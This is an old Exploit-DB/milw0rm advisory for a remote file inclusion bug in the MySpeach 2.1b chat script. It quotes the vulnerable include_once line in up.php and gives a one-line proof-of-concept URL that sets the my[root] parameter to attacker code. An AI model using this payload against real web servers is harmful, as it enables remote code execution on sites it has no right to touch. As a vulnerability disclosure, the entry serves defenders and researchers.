MySpeach <= 2.1b up.php Remote Inclusion Vulnerability

2007-01-20T00:00:00
ID EDB-ID:3165
Type exploitdb
Reporter 3l3ctric-Cracker
Modified 2007-01-20T00:00:00

Description

MySpeach <= 2.1b (up.php) Remote Inclusion Vulnerability. CVE-2007-0491,CVE-2007-0498. Webapps exploit for php platform

                                        
                                            ------------------------------------------------------------------------------------------------------------------------
Script:MySpeach
Affected Version:beta2.1 and maybe older
Downlaoad:http://www.graphiks.net/scripts/chat/myspeach-2.1beta.zip
------------------------------------------------------------------------------------------------------------------------
Author:Dr Max Virus
------------------------------------------------------------------------------------------------------------------------
Bug in (up.php)
Vul Code;
include_once($my['root'].'/admin/funcs.php');
------------------------------------------------------------------------------------------------------------------------
POC:
http://[target]/[path]/up.php?my[root]=[Bad Code]
------------------------------------------------------------------------------------------------------------------------
Thx:str0ke-koray-Timq-r0ut3r-nuffsaid-All My Friends
Special Greetz:AsianEagle-TheMaster-Kacper-Hotturk
------------------------------------------------------------------------------------------------------------------------

# milw0rm.com [2007-01-20]